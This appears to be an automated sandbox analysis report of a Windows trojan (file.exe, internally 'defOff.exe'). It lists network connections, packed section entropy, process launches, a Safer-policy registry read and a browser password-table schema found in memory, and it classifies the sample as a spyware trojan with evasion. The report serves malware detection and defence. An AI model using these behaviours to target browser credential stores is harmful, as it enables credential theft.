              Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
              Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
              Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
              Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
              Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
              Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
              Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49726 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.6:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49756 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49770 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49814 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49824 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:49865 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49883 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49973 version: TLS 1.2

              System Summary

              barindex
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exe, 00000000.00000003.2452622563.0000000005E6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2452707421.0000000005D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2459549473.0000000005F2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2464423120.0000000005D25000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000002.2620101802.0000000006286000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2458455182.0000000005D25000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2456157012.0000000005E07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2455951776.0000000005EDC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2461601887.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2455015439.0000000005D27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2459707431.0000000005D22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2461951081.0000000005E45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2452300344.0000000005D2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2454310904.0000000005E9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2455534715.0000000005D29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2454726855.0000000005D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2457778734.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2486127376.00000000057FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2486478527.0000000001376000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2462906708.0000000005D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2467513371.0000000005E6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2451557650.000000000598B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2451401294.0000000005984000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2456612982.0000000005E08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2451481448.0000000005D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2455434183.0000000005DF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2455301171.0000000005D26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2451972213.0000000005DCC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2457555309.0000000005E16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2452378442.0000000005DDE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2452528930.0000000005DC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2459870553.0000000005E30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2456054428.0000000005D2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2486276011.000000000576B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2457905147.0000000005F0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2457450355.0000000005D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2451892117.0000000005D2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2460744808.0000000005E36000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2464722476.0000000005D27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2465044712.0000000005FAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2463067946.0000000005E59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2454556299.0000000005DEE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2452138814.0000000005DD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2454030718.0000000005D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2460055470.0000000005F41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2458966381.0000000005E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2461239921.0000000005E3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2460239878.0000000005D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2463821994.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2454171566.0000000005DE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2454911600.0000000005DEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2460930295.0000000005F4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2458811000.0000000005D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2453612371.0000000005DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2457003576.0000000005E20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2467264161.0000000005D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2457118225.0000000005D2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2453515740.0000000005D28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2449837219.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2458099707.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2463482233.0000000005E5B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2460548668.0000000005D29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2458300424.0000000005E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2451721867.0000000005DBC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2453792510.0000000005D2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2456266983.0000000005D29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2464090804.0000000005E6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2462715004.0000000005F66000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2452443826.0000000005D25000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2461093107.0000000005D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2456889760.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2462313604.0000000005D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2457657969.0000000005D26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2463269614.0000000005D2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2451638297.0000000005D27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2459222078.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2457234809.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2455634776.0000000005DFA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2456719920.0000000005EEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2456500071.0000000005D2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2453703407.0000000005E91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2466042415.0000000005D25000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2464886471.0000000005E63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2453886012.0000000005DE4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2455205073.0000000005EBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2452222319.0000000005E80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2455742526.0000000005D2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2458647583.0000000005E29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2455849293.0000000005DFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2459394922.0000000005E22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2463652290.0000000005F8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2453418184.0000000005DDE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2464566063.0000000005E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2459116412.0000000005F30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2466918032.0000000005FAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2455111831.0000000005DF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2456386457.0000000005E04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2461404990.0000000005F53000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000002.2619814644.0000000005FD3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2462530301.0000000005E44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2466680090.0000000005E63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2487089151.0000000001367000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2462163758.0000000005F70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2460417615.0000000005E4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2486513340.0000000005744000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2454457048.0000000005D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2452052168.0000000005D2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2451807661.0000000005988000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: ZLIB complexity 0.9973055899339934
              Source: file.exeStatic PE information: Section: fhggskfg ZLIB complexity 0.9943598473510925
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/61@7/7
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000000.00000003.2266417990.0000000005772000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2242564260.0000000005777000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2243306928.0000000005758000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: file.exeReversingLabs: Detection: 42%
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2556 --field-trial-handle=2500,i,13953253401504598883,18053136304032162563,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1972,i,11730012379210978219,17128229350723911199,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2556 --field-trial-handle=2500,i,13953253401504598883,18053136304032162563,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
